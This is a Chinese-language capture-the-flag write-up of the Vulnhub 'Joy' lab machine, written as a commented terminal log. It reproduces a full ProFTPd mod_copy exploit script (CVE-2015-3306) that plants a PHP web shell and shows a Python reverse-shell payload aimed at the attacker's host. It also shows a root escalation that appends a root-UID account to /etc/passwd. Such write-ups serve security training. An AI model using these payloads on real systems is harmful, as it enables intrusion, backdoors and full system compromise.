Vulnhub之Joy靶機詳細測試過程
阿新 • • 發佈:2022-12-05
Joy
作者: jason_huawen
靶機基本資訊
名稱:digitalworld.local: JOY
地址:
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
識別目標主機IP地址
(kali㉿kali)-[~/Vulnhub/Joy] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor 192.168.56.100 08:00:27:9a:9e:c2 1 60 PCS Systemtechnik GmbH 192.168.56.254 08:00:27:e4:d2:fe 1 60 PCS Systemtechnik GmbH
利用Kali Linux自帶的Netdiscover工具識別目標主機的IP地址為192.168.56.254
NMAP掃描
┌──(kali㉿kali)-[~/Vulnhub/Joy] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 05:46 EST Nmap scan report for localhost (192.168.56.254) Host is up (0.00021s latency). Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download |_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload 22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0) 25/tcp open smtp Postfix smtpd | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 |_http-title: Index of / | http-ls: Volume / | SIZE TIME FILENAME | - 2016-07-19 20:03 ossec/ |_ |_http-server-header: Apache/2.4.25 (Debian) 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: CAPA TOP PIPELINING UIDL AUTH-RESP-CODE RESP-CODES STLS SASL | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Not valid before: 2019-01-27T17:23:23 |_Not valid after: 2032-10-05T17:23:23 |_ssl-date: TLS randomness does not represent time 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 LOGIN-REFERRALS ENABLE Pre-login IDLE have post-login listed capabilities OK STARTTLS LOGINDISABLEDA0001 more ID | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Not valid before: 2019-01-27T17:23:23 |_Not valid after: 2032-10-05T17:23:23 |_ssl-date: TLS randomness does not represent time 445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP) 465/tcp open smtp Postfix smtpd | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8 |_ssl-date: TLS randomness does not represent time 587/tcp open smtp Postfix smtpd | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8 |_ssl-date: TLS randomness does not represent time 993/tcp open ssl/imap Dovecot imapd |_imap-capabilities: SASL-IR LITERAL+ IMAP4rev1 ENABLE Pre-login IDLE LOGIN-REFERRALS have post-login listed AUTH=PLAINA0001 capabilities OK more ID |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Not valid before: 2019-01-27T17:23:23 |_Not valid after: 2032-10-05T17:23:23 995/tcp open ssl/pop3 Dovecot pop3d |_ssl-date: TLS randomness does not represent time |_pop3-capabilities: CAPA TOP USER UIDL AUTH-RESP-CODE RESP-CODES PIPELINING SASL(PLAIN) | ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG | Not valid before: 2019-01-27T17:23:23 |_Not valid after: 2032-10-05T17:23:23 MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC) Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 5h19m58s, deviation: 4h37m07s, median: 7h59m57s |_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.12-Debian) | Computer name: joy | NetBIOS computer name: JOY\x00 | Domain name: \x00 | FQDN: joy |_ System time: 2022-12-05T02:46:47+08:00 | smb2-time: | date: 2022-12-04T18:46:48 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 45.29 seconds
獲得Shell
──(kali㉿kali)-[~/Vulnhub/Joy] └─$ ftp 192.168.56.254 Connected to 192.168.56.254. 220 The Good Tech Inc. FTP Server Name (192.168.56.254:kali): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||23165|) 150 Opening ASCII mode data connection for file list drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload 226 Transfer complete ftp> ls -alh 229 Entering Extended Passive Mode (|||46554|) 150 Opening ASCII mode data connection for file list drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 . drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 .. drwxrwxr-x 2 ftp ftp 4.0k Jan 6 2019 download drwxrwxr-x 2 ftp ftp 4.0k Jan 10 2019 upload 226 Transfer complete ftp> cd download 250 CWD command successful ftp> ls -alh 229 Entering Extended Passive Mode (|||35903|) 150 Opening ASCII mode data connection for file list drwxrwxr-x 2 ftp ftp 4.0k Jan 6 2019 . drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 .. 226 Transfer complete ftp> cd .. 250 CWD command successful ftp> ls 229 Entering Extended Passive Mode (|||23286|) 150 Opening ASCII mode data connection for file list drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload 226 Transfer complete ftp> cd upload 250 CWD command successful ftp> ls -alh 229 Entering Extended Passive Mode (|||39457|) 150 Opening ASCII mode data connection for file list drwxrwxr-x 2 ftp ftp 4.0k Jan 10 2019 . drwxr-x--- 4 ftp ftp 4.0k Jan 6 2019 .. -rwxrwxr-x 1 ftp ftp 1.9k Dec 4 18:48 directory -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo -rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado -rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo -rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano -rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento -rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho -rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko -rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto -rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno -rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino -rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto -rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo -rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo -rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder 226 Transfer complete ftp> get reminder local: reminder remote: reminder 229 Entering Extended Passive Mode (|||61399|) 150 Opening BINARY mode data connection for reminder (24 bytes) 100% |*********************************************************************************| 24 37.80 KiB/s 00:00 ETA 226 Transfer complete 24 bytes received in 00:00 (21.90 KiB/s) ftp> get directory local: directory remote: directory 229 Entering Extended Passive Mode (|||25671|) 150 Opening BINARY mode data connection for directory (1908 bytes) 100% |*********************************************************************************| 1908 90.98 MiB/s 00:00 ETA 226 Transfer complete 1908 bytes received in 00:00 (4.90 MiB/s) ftp> get project_* local: project_* remote: project_* 229 Entering Extended Passive Mode (|||22671|) 550 project_*: No such file or directory ftp> quit 221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/04 05:53:24 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 219739 / 220561 (99.63%)===============================================================
2022/12/04 05:54:14 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/ossec/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/04 05:54:43 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README (Status: 200) [Size: 2106]
/js (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/tmp (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE (Status: 200) [Size: 35745]
Progress: 219775 / 220561 (99.64%)===============================================================
2022/12/04 05:55:34 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ gobuster dir -u http://192.168.56.254/ossec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254/ossec/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2022/12/04 05:56:09 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 13139]
/.html (Status: 403) [Size: 300]
/.php (Status: 403) [Size: 299]
/img (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/img/]
/site (Status: 301) [Size: 321] [--> http://192.168.56.254/ossec/site/]
/css (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/css/]
/lib (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/lib/]
/README (Status: 200) [Size: 2106]
/js (Status: 301) [Size: 319] [--> http://192.168.56.254/ossec/js/]
/setup.sh (Status: 200) [Size: 2471]
/tmp (Status: 301) [Size: 320] [--> http://192.168.56.254/ossec/tmp/]
/LICENSE (Status: 200) [Size: 35745]
/.php (Status: 403) [Size: 299]
/.html (Status: 403) [Size: 300]
Progress: 1101116 / 1102805 (99.85%)===============================================================
2022/12/04 06:00:32 Finished
===================================================
目錄和檔案掃描以後,並且訪問這些目錄或者檔案,並沒有可利用的目錄檔案。
掃描一下UDP埠:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ sudo nmap -sU --top-ports 50 192.168.56.254 -T4 -v
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 06:07 EST
Initiating ARP Ping Scan at 06:07
Scanning 192.168.56.254 [1 port]
Completed ARP Ping Scan at 06:07, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:07
Completed Parallel DNS resolution of 1 host. at 06:07, 0.01s elapsed
Initiating UDP Scan at 06:07
Scanning localhost (192.168.56.254) [50 ports]
Increasing send delay for 192.168.56.254 from 0 to 50 due to max_successful_tryno increase to 5
Discovered open port 161/udp on 192.168.56.254
Discovered open port 123/udp on 192.168.56.254
Increasing send delay for 192.168.56.254 from 50 to 100 due to max_successful_tryno increase to 6
Discovered open port 137/udp on 192.168.56.254
Warning: 192.168.56.254 giving up on port because retransmission cap hit (6).
Completed UDP Scan at 06:08, 23.89s elapsed (50 total ports)
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00096s latency).
PORT STATE SERVICE
7/udp open|filtered echo
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
80/udp open|filtered http
111/udp closed rpcbind
123/udp open ntp
135/udp closed msrpc
136/udp closed profile
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
518/udp open|filtered ntalk
520/udp open|filtered route
593/udp closed http-rpc-epmap
626/udp closed serialnumberd
631/udp open|filtered ipp
996/udp open|filtered vsinet
997/udp closed maitrd
998/udp closed puparp
999/udp open|filtered applix
1025/udp open|filtered blackjack
1026/udp closed win-rpc
1027/udp open|filtered unknown
1433/udp open|filtered ms-sql-s
1434/udp open|filtered ms-sql-m
1645/udp closed radius
1646/udp closed radacct
1701/udp closed L2TP
1812/udp open|filtered radius
1900/udp open|filtered upnp
2048/udp closed dls-monitor
2049/udp closed nfs
2222/udp closed msantipiracy
3283/udp closed netassistant
3456/udp closed IISrpc-or-vat
4500/udp closed nat-t-ike
5060/udp closed sip
5353/udp open|filtered zeroconf
20031/udp open|filtered bakbonenetvault
32768/udp closed omad
49152/udp closed unknown
49153/udp closed unknown
49154/udp closed unknown
MAC Address: 08:00:27:E4:D2:FE (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
Raw packets sent: 273 (16.867KB) | Rcvd: 37 (3.808KB)
UDP掃描發現SNMP埠是開放。但是沒有太大價值,還是需要圍繞FTP,因為NMAP掃描時知道其服務為ProFTP,但是不知道版本,從Ftp下載的directory檔案中有個version_control檔案,但是不知道檔案內容,看是否可以用ProFTPd的拷貝漏洞將其內容拿到:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ telnet 192.168.56.254 21
Trying 192.168.56.254...
Connected to 192.168.56.254.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
^Cquit
221 Goodbye.
Connection closed by foreign host.
此時再FTP到伺服器,即可看到version_control檔案了,將其下載到本地進行檢視:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
知道了ProFTPd的確切版本後,看有無漏洞:
找到漏洞利用程式碼:
https://www.exploit-db.com/exploits/36803
將其下載到本地:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ cat 36803.py
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) < 4):
print '\n Usage : exploit.py server directory cmd'
else:
server = sys.argv[1] #Vulnerable Server
directory = sys.argv[2] # Path accessible from web .....
cmd = sys.argv[3] #PHP payload to be executed
evil = '<?php system("' + cmd + '") ?>'
s.connect((server, 21))
s.recv(1024)
print '[ + ] Connected to server [ + ] \n'
s.send('site cpfr /etc/passwd')
s.recv(1024)
s.send('site cpto ' + evil)
s.recv(1024)
s.send('site cpfr /proc/self/fd/3')
s.recv(1024)
s.send('site cpto ' + directory + 'infogen.php')
s.recv(1024)
s.close()
print '[ + ] Payload sended [ + ]\n'
print '[ + ] Executing Payload [ + ]\n'
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
if (r.status_code == 200):
print '[ * ] Payload Executed Succesfully [ * ]'
else:
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
print '\n http://infogen.al/'
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ python2 36803.py 192.168.56.254 /ossec id
___ __ ____ _ _
|_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
| || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
| || | | | _| (_) | |_| | __/ | | | / ___ \| |___
|___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
[ + ] Connected to server [ + ]
id
^CTraceback (most recent call last):
File "36803.py", line 31, in <module>
s.recv(1024)
KeyboardInterrupt
執行沒有結果。
找到另外一個漏洞利用程式碼:
https://github.com/t0kx/exploit-CVE-2015-3306
┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ python exploit.py --host 192.168.56.254 --port 21 --path "/var/www/tryingharderisjoy"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.56.254:21
[+] Target exploited, acessing shell at http://192.168.56.254/backdoor.php
[+] Running whoami: www-data
[+] Done
訪問:
http://192.168.56.254/backdoor.php?cmd=id
可以成功得到結果,接下來設法獲得反向shell:
訪問:
http://192.168.56.254/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22])%27
kali linux上成功得到了反彈回來的shell:
┌──(kali㉿kali)-[~/Vulnhub/Joy/exploit-CVE-2015-3306-master]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 36146
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@JOY:/var/www/tryingharderisjoy$ ls
ls
backdoor.php ossec
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -alh
ls -alh
total 116K
drwxr-xr-x 8 www-data www-data 4.0K Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4.0K Dec 5 03:31 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35K Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2.1K Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4.0K Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5.1K Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4.0K Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2.5K Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4.0K Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4.0K Dec 28 2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat ossec_conf.php
cat ossec_conf.php
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - root
su - root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su - patrick
su - patrick
Password: apollo098765
patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$
提權
patrick@JOY:~/.config$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/tmp$ sudo -u root /home/patrick/script/test
sudo -u root /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../../../../../etc/passwd
../../../../../../../etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rwxrwxrwx 1 root root 2.5K Jan 28 2019 /etc/passwd
patrick@JOY:/tmp$
由於test只允許修改/script目錄下的檔案的許可權,所以需要繞過:
這樣我們就可以修改/etc/passwd,將root密碼刪除:
patrick@JOY:/tmp$ nano /etc/passwd
nano /etc/passwd
Error opening terminal: unknown.
patrick@JOY:/tmp$
但是不能用NanO
看來只能追加內容:
patrick@JOY:~$ sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed: couldn't open temporary file /etc/sedu0TEOo: Permission denied
patrick@JOY:~$ which sed
which sed
/bin/sed
patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$ echo 'test' >> /etc/passwd
echo 'test' >> /etc/passwd
patrick@JOY:~$
可以建立一個使用者,賦予root許可權
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ openssl passwd -1 -salt jason 12345
$1$jason$qsg4ck0ojTQvTEpTDPg2C1
將使用者jason,追加到/etc/passwd檔案中去:
patrick@JOY:~$ echo 'jason:$1$jason$qsg4ck0ojTQvTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
<vTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
patrick@JOY:~$ su jason
su jason
Password: 12345
root@JOY:/home/patrick# cd /root
cd /root
root@JOY:~# ls -alh
ls -alh
total 104K
drwx------ 8 root root 4.0K Jan 28 2019 .
drwxr-xr-x 23 root root 4.0K Jan 6 2019 ..
---------- 1 root root 1.4K Jan 27 2019 author-secret.txt
-rw------- 1 root root 3.1K Jan 28 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K Jan 5 2019 .cache
drwxr-xr-x 5 root root 4.0K Jan 5 2019 .config
drwx------ 3 root root 4.0K Jan 5 2019 .dbus
-rw-r--r-- 1 root root 435 Jan 7 2019 document-generator.sh
-rw-r--r-- 1 root root 1.3K Jan 28 2019 dovecot.crt
-rw-r--r-- 1 root root 1.1K Jan 28 2019 dovecot.csr
-rw------- 1 root root 1.7K Jan 28 2019 dovecot.key
drwxr-xr-x 3 root root 4.0K Jan 5 2019 .local
-rw------- 1 root root 231 Dec 28 2018 .msmtprc
-rw------- 1 root root 36 Dec 28 2018 .mysql_history
drwxr-xr-x 2 root root 4.0K Dec 28 2018 .nano
-rw-r--r-- 1 root root 540 Jan 10 2019 permissions.sh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 71 Jan 10 2019 proof.txt
-rw------- 1 root root 1.0K Jan 28 2019 .rnd
-rw------- 1 root root 1.7K Jan 28 2019 rootCA.key
-rw-r--r-- 1 root root 1.5K Jan 28 2019 rootCA.pem
-rw-r--r-- 1 root root 17 Jan 28 2019 rootCA.srl
-rw-r--r-- 1 root root 66 Jan 6 2019 .selected_editor
drwx------ 2 root root 4.0K Jan 6 2019 .ssh
-rw-r--r-- 1 root root 209 Dec 28 2018 .wget-hsts
root@JOY:~# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
root@JOY:~#
成功拿到了root flag.
經驗教訓
- 本靶機從80 web服務中基本上沒有獲取有價值的資訊。